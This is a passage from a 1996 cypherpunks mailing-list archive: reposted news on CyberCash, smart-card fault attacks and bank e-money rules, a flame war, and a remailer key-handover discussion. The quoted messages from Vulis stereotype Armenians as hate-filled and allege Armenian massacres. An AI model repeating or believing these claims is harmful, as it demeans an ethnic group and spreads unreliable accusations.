alliances with banks, credit card-processing firms, makers of Internet
software for businesses and consumers -- such as Netscape, Oracle Corp. and
Sun Microsystems Inc. -- and service providers such as CompuServe.

CyberCash decided early on that it was better off cooperating with banks
rather than competing with them. "We knew that the Internet was going to so
challenge all of . . . life's assumptions that we were not interested in
asking consumers to also leave the safe haven of their current banking
relationships," Melton said.

The company wants banks to put their names on the CyberCash wallet and offer
it to their customers. So far, it has forged relationships with dozens of
financial companies, including First Union Corp. and First Data Corp., the
nation's largest credit card processor. To accept CyberCoin payments,
merchants must use a bank allied with the company, but consumers can establish
CyberCash wallets using any bank or credit card company.

The consumer begins by in effect buying CyberCoin currency -- up to $ 20 at a
time. This is done by transferring funds from a credit card or checking
account to a bank account controlled by CyberCash. Encoded digital currency is
placed on the storage disks of the us er's computer, and is transmitted over
the network when purchases are made. Merchants then redeem the digital
currency for the conventional kind via electronic networks run by CyberCash
and the banking system. In this closed loop, the digital money can be spent on
ly once before being cashed in.

That distinguishes CyberCoin from other forms of electronic money that can
circulate endlessly and anonymously like traditional cash or "bearer
instruments" issued by governments. It also reduces the danger that CyberCoin
would be counterfeited or used for money-laundering, major concerns of law
enforcement authorities who are closely studying the emerging electronic money
systems.

When consumers shop with CyberCoin, they do so under a veil of cryptographic
confidentiality. They hold electronic "keys" that can unlock the code. With a
subpoena, the government could compel users to surrender the keys, which would
make it possible to trace their purchases. But unless the user surrendered the
key, the most CyberCash could do to assist law enforcement would be to stop
encrypting transactions for that person.

That's CyberCash's attempt to balance the government's police interests with
the consumer's privacy interests.

"There are no easy answers in this area," said Raymond Kelly, the Treasury
Department's undersecretary for enforcement. "We think electronic money is
good for the country and the world. But there [are] still many outstanding
issues" for policymakers to consider, Kelly said.

The final pillar of CyberCash's strategy is to rely on software, which can be
easily transmitted over the network, rather than hardware add-ons to a
computer.

Some alternative approaches would employ devices such as stored value cards --
plastic cards embedded with computer chips. Those systems -- roughly akin to
Metro farecards -- would also require users to attach card readers to their
computers. Some analysts predict that smart cards eventually could dominate
the market, but CyberCash believes that software solutions will spread faster.
The CyberCash wallet could be adapted to work with smart cards, but at a
reduced level of profitability, Melton said.

For all its progress, CyberCash has also missed opportunities, one former
executive said. It failed to forge a relationship with America Online's 6.2
million-member service. "Shame on me for that," Melton said of his
unsuccessful run at AOL, but he added that as a member of its board he was
unwilling to push AOL too hard.

CyberCash has yet to build an alliance with Microsoft Corp. For a long time it
didn't even try, because Melton thought it should wait until it had more to
show for itself. Former marketing vice president Magdalena Yesil questioned
that judgment. "Putting your head in the sand doesn't get you away from
trouble," she said. "It actually allows the trouble to get bigger."

Perhaps most seriously, the company has yet to recruit many merchants to
accept CyberCash payments. "As a consumer, what do I do with this thing?"
Yesil asked rhetorically. "It's like somebody giving me Turkish liras in
California."

CyberCash's closest competitor, an Amsterdam company called DigiCash, requires
consumers to open accounts at designated banks, and it has enlisted only Mark
Twain Bank in the United States. Other competitors may soon appear, though.
Citibank is working on its Electronic Monetary System. Melton's old company,
VeriFone, is readying on-line card readers.

And Digital Equipment Corp. promises it will launch a service called
Millicent, with much lower transaction charges than CyberCoin's.

Before long, these companies may count their fees not in pennies, but in
fractions of pennies. Then, zillions of transactions won't ensure
profitability. It will take bazillions to get there.

FEWER MIDDLEMEN, BIGGER MARGIN

The chief executive of Virtual Vegas sees products such as CyberCoin as
nothing short of "revolutionary," and he says the proof is the cards --
blackjack cards, to be precise.

The Virtual Vegas Turbo Blackjack computer game sells in stores for $ 29.95.
But with CyberCoin, Virtual Vegas is selling it on the Web for $ 2.95, a tenth
of the price. And CEO David Herschman says he could make more money doing it.

Each $ 29.95 CD-ROM version of the game yields a profit of about $ 4.50 after
deducting the retailers' and distributors' share of the price; production,
packaging and shipping costs; sales commissions; and unpaid accounts.

By contrast, each $ 2.95 copy of the game paid for with CyberCoin and
delivered over the Web costs Virtual Vegas about 26 cents, yielding a $ 2.69
profit. At the Web price, Virtual Vegas could sell many more copies, Herschman
said.

"The profit margin is huge," he said. "We make it once and . . . we could sell
that from here to eternity."

HOW A CYBERCOIN TRANSACTION WORKS

1. CyberCash Inc.'s electronic wallet software is downloaded from its Web site
at http://www.cybercash.com to a user's computer. The user fills the wallet
with money by transferring funds from a checking account or credit card to a
bank account controlled by CyberCash. The actual money stays in the account
until after a purchase has been completed. To fill the wallet from a checking
account, users must mail in a voided check. CyberCash then loads the wallet
with digitally encrypted symbols representing the allotted money in the bank.

2. To buy something, the consumer clicks the PAY button on a participating
merchant's Web site. The code for the money is verified by CyberCash. The
electronic product -- such as an on-line document or news article -- is
transferred to the user's computer. The code for the money is transferred from
the user's wallet to the merchant's electronic "cash register." The user's
wallet logs all transactions.

3. When the merchant empties the cash register of its coded payments,
CyberCash transfers the actual money to the merchant's bank account from the
account where it was holding the consumer's funds. CyberCash deducts a
transaction fee from the merchant's payment. The fee is split among CyberCash,
the consumer's bank and the merchant's bank.

4. The user can return unspent funds to a checking account, but not to a
credit card.


American Banker, 10/23/96

Phone alliance may rival banks in electronic cash

A smart card alliance of five telephone companies could raise competitive
obstacles to banks that desire to control electronic cash transactions. US West
Communications, GTE, Bell Canada, PTT Telecom Netherlands, and Telekom Malaysia
announced formation of the Global Chipcard Alliance at the CardEx 96 conference
this month in the Netherlands. Additional members are welcome. Oracle Corp.,
the data base software giant, plans to join, said US West. The alliance wants
to create an open standard to allow any smart telephone card to operate in any
pay telephone network. Some partners' cards are already interoperable -- for
example, GTE cards work in telephones installed by US West and vice versa --
and alliance members may have the power to affect technology in the banking and
payments field. Though phone card standards are its initial target, the
alliance could view electronic purses and other chip card applications as
viable opportunities. The major bank credit card associations have produced a
smart card standard called EMV, for Europay, MasterCard, and Visa. It is
designed to assure that merchants' terminals accept all compatible cards. The
chip card group could incorporate EMV into its operating standard.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 24 Oct 1996 14:05:34 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [NEWS]
Message-ID: <6uFBwD4w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


New York Times: Monday, October 21, 1996

Israelis Cite New Risk To Electronic Data Security

By JOHN MARKOFF

Two of Israel's leading computer scientists say they have found a way to more
easily decode and then counterfeit the electronic cash ``smart cards'' that
are now widely used in Europe and are being tested in the United States.

The researchers have begun circulating the draft of a paper that points out
higher security risks than those discovered last month by scientists at Bell
Communications Research.

The Bell researchers had reported that it might be possible to counterfeit
many types of the ``smart cards'' that are being tested by banks and
credit-card companies, including Visa and Mastercard.

The two Israeli scientists, Adi Shamir, a professor at the applied mathematics
department at the Weizmann Institute, and Eli Biham, a member of the faculty
of the computer-science department at the Technion, reported that in addition
to the so-called public key coding systems that were found vulnerable by the
Bellcore team, private key data coding systems such as the American Data
Encryption Standard, or DES, can be successfully attacked if a computer
processor can be made to produce an error.

The two Israelis made a draft of their research available via the Internet on
Thursday. In their paper the two wrote, ``We can extract the full DES key

from a sealed tamperproof DES encrypter'' by analyzing fewer than 200 encoded
messages.

Both public key and private key data-scrambling methods are based on the
difficulty involved in factoring large numbers. A public key system permits
two parties who have never met to exchange secret information. A private key
system requires that a secret key be exchanged beforehand.

Data-coding experts said that the new Israeli method might be a more practical
system than the previously announced Bellcore method, because unlike public
keys, which are frequently used only once per message, a private secret key
may be used repeatedly to scramble electronic transactions.

``This seems a lot closer to something that might actually be used,'' said
Matt Blaze, a computer researcher at AT&T Laboratories.

Smart cards have been promoted as tamperproof, which is why computer
scientists at Bellcore, one of the United States' leading
information-technology laboratories, sounded the alarm last month, saying that
a savvy criminal might be able to tweak a smart-card chip to make a
counterfeit copy of the monetary value on a legitimate card.

Executives at smart-card companies said at the time that the attack was
theoretical and that it would be impossible to make a smart card generate an
error without actually destroying the card.

However, Biham responded that he believed such hardware attacks were possible.
The cards are generally damaged by means of heat or radiation, which causes
the computer chip in the card to generate an error, which the Israeli
scientists used to obtain the code key and copy the card.

``I have ample evidence that hardware faults can be generated without too much
difficulty,'' he said in an electronic-mail message. ``As a consultant to some
high-tech companies, I had numerous opportunities to witness successful
attacks by commercial pirates on pay-TV systems based on smart cards.

``I know for a fact that some of these attacks were based on intentional clock
and power-supply glitches, which can often cause the execution of incorrect
instructions by the smart card.''

Other researchers said that the class of attacks demonstrated by the Bellcore
team and the Israelis had been known by some members of the tightly knit
community of cryptographers for several years, but the results had not been
published.

``Some of the smart-card manufacturers are well aware of this flaw,'' said
Paul Kocher, an independent Silicon Valley data-security consultant. ``But it
doesn't mean that they have fixed it.''


American Banker: Monday, October 21, 1996

Bank Regulations Are No Obstacle to E-Money Ventures

BY THOMAS P. VARTANIAN

Banks and holding companies have three strategic alternatives for delivering
new electronic products and services to customers: They can develop them
through internal expansion; acquire, whole or in part, companies that provide
them; or enter into joint ventures, networks, alliances, and partnerships.

Experts seem to believe the third approach provides banks with the optimal
array of business opportunities. But successful technology ventures require a
blend of business skills, savvy instincts, and an understanding of the legal
pitfalls.

Venture partners must be compatible in strategic goals, competitive vigor,
geography, cultural affinity, and social constitution. As the trend toward
technology-driven ventures develops, so must regulators correspondingly expand
their views of what constitutes permissible banking activities. As they do,
and as Internet commerce and electronic money transform the nature of banking
relationships and money, banks and bank holding companies should

constantly evaluate how investments in subsidiary corporations, partnerships,
joint ventures, and limited-liability companies may facilitate their
strategies to remain technologically competitive.

In January 1996, the Office of the Comptroller of the Currency explained its
current position regarding the ways in which the operating subsidiaries of
national banks may co-venture with nonregulated entities in the development
and delivery of new technological products and services. In that decision, the
OCC approved the contribution of a merchant credit card business by a group of
affiliated national banks to a technology company, in exchange for a
collective 40% equity interest in that company. Other initial shareholders in
the transaction included a venture capital fund, a telecommunications company,
and management of the company.

The newly formed operating subsidiary planned to complete a public offering
and further reduce the banks' ownership interests subsequent to this initial
transaction.

Similarly, the OCC approved in March a national bank operating subsidiary's
participation in a joint venture that was 50% owned by 31 depository
institutions, including four national banks.

The venture was to provide automated teller machine and point of sale services
to depository institutions in the northwest United States and western Canadian
provinces. It also would operate a transaction switch, transmit information to
other networks pursuant to gateway agreements, provide ATM and POS-related
services to owners and members, and furnish net settlement information.

These authorizations reflected a flexible approach to two critical factors:
the list of activities that national banks may legally engage in; and the
manner in which they can be so engaged.

With respect to the latter point, the OCC will make exceptions to its
traditional requirement that national banks control at least 80% of their
operating subsidiaries and permit minority investments in subsidiaries if
certain conditions regarding the activities and independence of the subsidiary
are met. The OCC seems to recognize such subsidiaries will be a necessary
vehicle for national banks to remain competitive in technologically driven
markets.

The Board of Governors of the Federal Reserve System is similarly
accommodating. On May 21, it authorized Cardinal Bancshares to acquire Five
Paces Software Inc. through a wholly owned thrift subsidiary, Security First
Network Bank, and thereby engage nationwide in data processing activities
relating to financial services over the Internet. The Fed noted that all of
Five Paces' data processing and transmission activities "are provided in
connection with transactions in accounts maintained by a financial
institution. "

The agency had previously determined that "the development, production, and
sale of software that allows a customer to conduct banking transactions using
personal computers (is permissible because it) is closely related to banking."

On Feb. 6, the Fed approved the acquisition by Royal Bank of Canada of 20% of
the voting shares of Meca Software LLC. The Fed relied on Section 225.25(b)(7)
of Regulation Y, which permits bank holding companies to provide data
processing and data transmission services, facilities (including software),
data bases, or access to such services, facilities or data bases by any
technological means, so long as the data to be processed or furnished are
"financial, banking or economic in nature."

Interestingly , the central bank disregarded the fact that Meca conducted
nonfinancial activities. It concluded that those software products --
including games, computer security programs, a medical reference library, and
a program providing basic legal forms -- did not have dedicated employees or
resources, produced only 7% of the company's revenues and would not be
upgraded, enhanced or promoted. Therefore, they would not preclude approval.

Similar limitations on nonfinancial data processing and transmission services
facilitated the Fed's approval of a de novo subsidiary of Compagnie Financiere
de Paribas on Feb. 26 to produce integrated billing software programs for
digital mobile telephone networks.

It remains to be seen how the Federal Reserve or the OCC will respond to
requests to engage in technological activities that are not directly
financial, banking, or economic in nature. However, the agencies seem to be
signalling a willingness to be expansion-minded.

The Fed issued an order July 1 allowing four banks in Ohio and Pennsylvania
through their ATM affiliate, Electronic Payment Services Inc., to provide data
processing and other services relating to the distribution of tickets, gift
certificates, prepaid telephone cards, and other documents.

Proposals regarding joint ventures in electronic money, smart card systems,
and PC hard-drive currencies are pending. The regulators are becoming attuned
to new types of regulatory issues and concerns.

For example, in its Cardinal Bancshares order, the Fed said it expects
acquisitions such as Five Paces to "enhance consumer convenience by expanding
the availability of electronic banking services and by making those services
available in new ways." But it warned that defects in security policies or
procedures would be considered unsafe and unsound banking practices because of
the risks associated with the provision of services over the Internet.

Not since Jesse James was practicing his entrepreneurial skills has bank
security become such a regulatory concern. Since no human can exist in
cyberspace, and identification and verification of parties over the Internet
may be subject to manipulation, the Fed is clearly telling banks to take
prudent steps and utilize state-of-the-art cryptography to discourage and
prevent computer break-ins, counterfeiting, theft of accounts and identities,
systemic attacks and informational warfare.

A fair enough admonition -- one that many banks can satisfy only by working
with partners and unaffiliated entities.

But entrepreneurial business venturers do not mix easily with regulation.
While a bank's joint-venture partner may be a high-quality technology company,
it may not be accustomed to the kind of regulatory examination, intervention,
and enforcement that banks know. This issue must be resolved at the inception
of a joint venture to avoid subsequent disputes.

Given the way current laws work, nonbanks may want to join with a bank holding
company affiliate rather than a bank subsidiary to avoid the liability that
can attach to an "institution-affiliated party," such as a subsidiary of an
insured bank.

Traditional concepts of due diligence will also have to be substantially
augmented and modified to adequately evaluate businesses in cyberspace. No
longer will physical reviews of corporate documents and officer interviews
suffice. Bank acquirers and co-venturers will have to thoroughly consider the
extent to which electronic breaches, theft, counterfeiting and manipulation of
systems have occurred or can occur.

Given the ever-increasing technological capacity available to cyberspace
pirates, security protocols will have to efficiently accommodate new
generations of technological upgrades. Off-line, unaccountable smart cards may
have to be upgraded by the originator or issuer through virus- like
transmissions spread card-to-card and card-to-terminal.


Similarly, the encrypted identifying marks of electronic money may need to be
regularly reformatted in order to limit the amounts that can be counterfeited
or duplicated.

In the intellectual property area, an acquired or co-ventured technology
business may only be worth what it costs if the products and services and
their underlying software and programs are adequately protected or protectable
under copyright, trademark, and patent laws.

Given the dizzying rate at which such filings are occurring in electronic
banking and commerce, it is equally critical to determine that any technology,
products, or services being acquired do not violate pending or issued licenses
in any jurisdiction in the world. The Internet is a worldwide marketing
mechanism, and users will have to consider the laws and customs of a multitude
of jurisdictions -- even those where they may never have done business or
intended to do business.

In any joint venture, affiliation, or alliance, the contracting parties must
determine who "owns" the customer. But in the world of cyberspace, where
traditional identities and boundaries no longer apply, ownership and access
issues will be even more important, particularly when a venture is unwound or
dissolved.

Banks have traditionally sought to share information between and among
affiliates for marketing purposes. Where the affiliate is not a controlled
subsidiary, however, such sharing may be problematic and even illegal under
state privacy laws.

As electronic commerce and smart card products begin to be introduced and gain
acceptance, certain brands will naturally become more prominent and
recognized. Unlike the branding issues that are important to companies in the
consumer products area, these electronic products will have to fight for
market share among consumers who put a premium on confidence and trust.

Banks will have to find ways to continue to accommodate the financial as well
as emotional elements of the relationship that exists between an individual
and his or her money. Brands and logos that evoke confidence and trust will be
extremely valuable, and should be treated accordingly in the business ventures
that develop.

Technology co-ventures must have workable and verifiable policies and
procedures concerning disaster recovery. How an organization deals with
traditional crashes, power losses, and breaches will indicate its capability
in this area. No financial institution that relies on public trust and
confidence can tolerate the loss of business information or customer data,
particularly if it keeps customers from their money, electronic or otherwise,
for some period of time.

Odds are that many banks will not be able - or prefer not - to "go it alone."
The landscape is already filled with dozens of alliances and joint ventures,
and the business is still in its infancy. At the same time, banks should not
be too quick to dilute or share their long-standing consumer trust and
confidence. They have as much to give as they do to gain in technology joint
ventures, and they should negotiate accordingly.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Thu, 24 Oct 1996 11:49:29 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Slander by Vulis. Possible lawsuit?
In-Reply-To: <yq69VD3w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961024141130.16354C-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 23 Oct 1996, Dr.Dimitri Vulis (spammer and flame artist) KOTM wrote:

> I used to think that ethnic flames were off-topic for cypherpunks, but seeing
> how Timmy May and his friends sput off every day about "crazy Russians", I'm
> beginning to think that it may be on-topic.

Right.  How many "crawzy Russians" messages have you seen from me?  If 
I've attacked you, it's your cowardice and your spamming that I've 
attacked.  Show me a message I've posted that attacks your ancestry?
 
> Surely the fact that Armenians have massacred more Jews and Moslems during
> 20th century alone than there are Armenians has certain connections to
> assassination politics.

Nice try.  Assassination Politics have little to do with your masacres, 
and I am not about to bring up the earlier massacre of Armenians by Turks.
There is of course a second side to every coin, but of course you fail to 
report on that, because your reports are of the yellowest form of journalism.

It is indeed a nice try, but all you are doing is posting spam news 
postings which are copyrighted.  And again, you didn't answer the 
question of whether or not you received permission to copy those texts 
and post them on line.

Had you brought up the question of how this applies to assasination 
politics, you might have gotten away with some of it, but alas, you 
didn't think of that until now

Next question - if that stuff has any relation to assasination politics, 
why didn't you bring it up until now?  Possibly because you needed some 
reason to justify your flames, right? :)  Your excuses are very very thin 
Vulis.

> > As for "censorous flamer" you sir have done plenty to make my filtered 
> > list thrive.  I have received by far more new subscribers to the filtered 
> > version than ever before.  Why?  Because everyone is tired of you and 
> > your silly flames.  Were I mercenary enough to charge money for the 
> > filtered list, you, sir would have made me a rich man.
> 
> I pity the fools who want a genodical maniac to filter what they read.

Maybe so, but you are the reason they have joined my list.  Doesn't that 
just warm the cockles of your heart?  You are actually helping my 
filtered list with your cretinous flames and spams.  Doesn't it make you 
feel good?
 
> > However, you are doing nothing to hurt me in any way.  I don't care what 
> > your oppinions are as to my ancestry, nor do I care to satisfy them one 
> > way or another by answering your cretinous flames.
> 
> You certainly write several times more on this subject than I do.

Judging at how you like to send 48Kb spams every once in a while - 
technically not written by you, yes - you seem to have a lot more racial 
prejudice than you would like others to believe.

Again, where did I bring up your ancestry?  And where did you bring up 
mine?  You seem to have little tiny balls, and one way you inflate them 
is by claiming to have been racially snubbed, but the truth is you are 
attempting to damage my reputation with racial slanders.

Tell me Vulis, and prove this, in what way am I responsible for the 
single death or maiming of any person?  Show us the evidence.  Not your 
flamed news postings, but real evidence.

I was not born in the region where that war exists, I never lived there.  
In fact, my parents weren't even born there.  You see Vulis, my 
grandparents left that scraggy piece of land called Armenia while their 
families were masacred by the Turks.  So how is it that you claim that my 
ancestors and are responsible for wars going on now when they weren't 
even anywhere near it?

You also insinuate that by extension I am responsible for attacks against 
Muslims and Jews.  That too is slanderous and racist, as racist as any 
attack you claim has wronged you.

I'd call that accusation and lack of proof slanderous.  What do the 
lawyers on this list think? Hrmmm?

> > You seem to think that you can get away with anything. But keep pushing, 
> > eventually you'll say something that will wind you up with a slander suit.
> 
> Spoken like a true Libertarian. They always threaten to sue for
> libel whenever they disagree with someone.

And why not?  If you libel my name, it will cost you. And that's not 
libertarianism, it's capitalism.  Just as trademark infringement and 
copyright laws are settled through money.  (Speaking of copyright, you've 
yet to prove written permission for your repostings sir.)

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@sundernet.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | "A toast to Odin,  |KA| law abridging the freedom of speech'|==\|/==
 + v + |God of screwdrivers"|AK|        do you not understand?       |=======
========================http://www.sundernet.com=============================
      If the Macintosh is a woman...  Then Windows is a Transvestite!
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Thu, 24 Oct 1996 11:53:58 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Timmy May is a jerk
In-Reply-To: <1969VD5w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961024145408.16354D-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 23 Oct 1996, Dr.Dimitri Vulis KOTM wrote:

> You have a point thee - I'll stop, not because IBM or Netscape might mind
> my reposting their press releases here, but because I've recept some pretty
> rude e-mail from John Gilmore telling me to stop posting off-topic to this
> mailing list, which has turned into a playground for Timmy May and other
> inane flamers. Clearly, anything "crypto-relevant" is off-topic. Only ethnic
> flames about Cossacks (???) and religious flames about mormons, posted 
> prodigiously by Timmy May and his cohorts, are on-topic.

At last some progress has been made with you.  At least the news spams 
will stop.  And no, crypto-relevant stuff is on topic, flames and spams 
aren't.
 
> P.S. I do have Dr. Argic's permission to repost his collection of materials
> on the genocide of Jews and Moslems by Armenians.

Lovely, but also off topic.

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@sundernet.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | "A toast to Odin,  |KA| law abridging the freedom of speech'|==\|/==
 + v + |God of screwdrivers"|AK|        do you not understand?       |=======
========================http://www.sundernet.com=============================
      If the Macintosh is a woman...  Then Windows is a Transvestite!
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Thu, 24 Oct 1996 12:07:28 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: slander and call for lawyers. :)
In-Reply-To: <7kg9VD9w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961024150217.16354F-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 22 Oct 1996, Dr.Dimitri Vulis KOTM wrote:

> As I said, *I* don't see what relevance ethnic flames could possibly have
> to a supposedly crypto-related mailing list, but Timmy May and his few friends
> clearly disagree - witness their many rants about Russians and Cossacks (????)
> as well as attacks on mormons. I also recall some clearly anti-Semetic rants
> from Timmy May (something about Israel deserving to be nuked).

If that's the case, then why are you posting anti-Armenian flame spams? 
Your pots are blacker than your kettle?
 
> As for Ray, he's a typical hate-filled Armenian. Armenian heritage has been
> defined for centuries in terms of "race-worship" and hatred for Moslems,
> Jews, and anyone else non-Armenian. It's somewhat surprising to see such
> stereotypical "old-country" behavior in an alleged Californian.

The above paragraph is clearly slanderous.  Up until now you've danced 
around it.  Here you clearly state and implicate me in your racist 
remarks.  Congratulations, you can now be sued.  As for Californian, 
you've another thing coming.  I'm not in California.  You might be very
surprised to find out just where I live.  But don't worry, you will have 
to deal with this in a court of law.  Have a nice day Vulis.

So there you have it folks, a clear and outright slanderous remark.  We 
have lawyers on this list, who wants to hang Vulis out to dry? As for his 
previous remarks, I've saved them too.  There's more than enough to get a 
nice tidy bunch of bucks out of him, I understands he runs D&M 
consulting, right?  I'm sure his business makes a tidy profit, so there's 
a nice go there.

> And I don't see any evidence that Timmy or Ray are "crypto people".

That's because you're not a crypto person and have no clue as to who 
are.  I'm not about to sit here and trumpet the things I've done for 
crypto.  Neither will Tim.

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@sundernet.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | "A toast to Odin,  |KA| law abridging the freedom of speech'|==\|/==
 + v + |God of screwdrivers"|AK|        do you not understand?       |=======
========================http://www.sundernet.com=============================
      If the Macintosh is a woman...  Then Windows is a Transvestite!
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Thu, 24 Oct 1996 12:10:41 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: slander again
In-Reply-To: <P7a9VD1w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961024151053.16354G-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 22 Oct 1996, Dr.Dimitri Vulis KOTM wrote:

> On the other hand, Ray Arachelian is a typical product of the hate-
> filled Armenian culture. Folks fortunate enough not to know many
> Armenians don't realize that their self-identification is built upon the
> hatred for Moslems, hatred for Jews, for their Georgian neighbors, and
> generally everyone. Ray spouting off about "amoeba shit" sounds like a
> typical hate-crazed Armenian, despite being in California.

Thanks man.  Keep going, I sure could use your money.  Slander away.  
Don't stop.  Just keep it up and soon all of your pay check will go in my 
pocket.

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@sundernet.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | "A toast to Odin,  |KA| law abridging the freedom of speech'|==\|/==
 + v + |God of screwdrivers"|AK|        do you not understand?       |=======
========================http://www.sundernet.com=============================
      If the Macintosh is a woman...  Then Windows is a Transvestite!
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matts Kallioniemi <matts@cyberpass.net>
Date: Thu, 24 Oct 1996 07:28:23 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Netescrow & Remailers?
Message-ID: <3.0b36.32.19961024162651.0093fab0@localhost>
MIME-Version: 1.0
Content-Type: text/plain



How about this idea for improving the remailer network:

Every remailer is marked as either IN or OUT, not both. An IN remailer
accepts mail from anybody but remails only to other remailers (IN or OUT).
An OUT remailer never remails to another remailer, only to final recipient
addresses.

If an IN remailer finds itself as the last one in the chain then it picks
an OUT remailer at random to send the message through.

This way there would never be any abuse complaints on IN remailers because
they are invisible. When an OUT remailer is taken out nobody gets hurt
because OUT remailers will never be used in reply blocks.

Matts





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 25 Oct 1996 12:01:53 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Netescrow & Remailers?
In-Reply-To: <v03007800ae9417ae8f94@[207.167.93.63]>
Message-ID: <199610241534.QAA00443@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Tim May <tcmay@got.net> writes:
> At 10:54 AM -0500 10/23/96, Adam Shostack wrote:
> >	Would it make remailers more reliable to use a netescrow
> >system, so that if a remailer goes offline, the others can request its
> >keys, and continue moving its messages?
> >
> >	To me, reliability is as large a problem as UI.  If the next
> >Mixmaster is going to do direct IP transport, reliability could
> >increase as a problem.
> 
> This seems like a very good idea. I have an idea for transitioning from the
> current "physical site name" approach remailers are using, to perhaps a
> "logical site name," where logical names (like "AliceRemailer") would be
> aliased or mapped (through a collectively-maintained, or Raph
> Levien-maintained (:-}) list of logical-to-physical site names. Thus, if
> the physical site or physical account name which maintained the
> "AliceRemailer" remailer and keypair were to vanish or have the account
> yanked, another site/account could "inherit" the keypair (by suitable
> arrangements) and the persistence of the site AliceRemailer would be
> ensured.

As Adam (Shostack) suggested, and also as discussed by John Gilmore in
response (on coderpunks) to my reply to his "anonymous.net" proposal,
MX records provide a way to do this.

John was talking about using "remailer@mail.anonymous.net" as a single
entry point into the remailers in general, with multiple MX records
meaning that the mail would go to random actual remailers.  The
remailer would then forward to the correct remailer.

Also suggested was "remailer@1234.mail.anonymous.net", which would
again me MXed to a particular remailer.  The same technique would
allow MX records to point to remailers by name rather than being
numbered.  Your Alice becomes <remailer@alice.mail.anonymous.net>
using MX forwarding (or remailer@alice.alias.net, the other domain
used for remailer MX redirection).

And of course the nice thing about MX records (and A records) is that
they have TTLs (Time To Live) which when set appropriately means that
they can be made to point at different IP addresses at the drop of a
hat.  And the old email address works as before (once you've also
reallocated the key).

> But I have some questions about possible implementations. Suppose a
> remailer is named "Alice@foo.bar," or "Alice" for short. Alice has a key,
> AliceKey.
> 
> Now imagine that the Alice remailer goes down, for whatever reason. Alice
> (the person or owner) can "authorize the release of AliceKey" to another
> remailer of her choosing (or by prior arrangement, as a fallback remailer).
> So, Bob takes over Alice's traffic.
>
> [...]
>
> I don't see that this would create new security problems, as the private
> keys for a logical remailer are only passed on to another site if and when
> the remailer owner _wants_ to. (This is back to the familiar theme that the
> owner of a private key can pretty do what he wants, including passing it on
> to others.)

I was thinking of the same idea, of reallocating keys, and one issue
which did occur to me, is that when remailer Alice goes off-line this
is as like as not to be the result of some law enforecement (LE)
interference.  If the LEs also happen to own a few remailers, they may
`encourage' the remailer operator to hand over the key to one of their
own remailers.

It might be nice if the attacked remailer was able to hand the keys to
a random other remailer, in such a way that it was publically
verifiable that the selection was random, and verifiable as to which
remailer got the key.  (The remaining remailers engage in a publically
verifiable cryptographic selection of straws, the shortest straw gets
the key).  

Naturally there is nothing to stop any given remailer giving the key
away to all and sundry, and nothing to stop the spooks starting lots
of remailers.

Also if the spooks own more than half the remailers the above may be
worse than the remailer owner giving the key to a trusted friend.

Another approach would be for the remailer to release a timestamped
hash of it's key reallocation policy.  When the remailer is
decomissioned, this will allow people to see that it is adhering to
it's stated policy.  (The policy could specify a verifiable random
selection from a list of remailers selected by the owner).

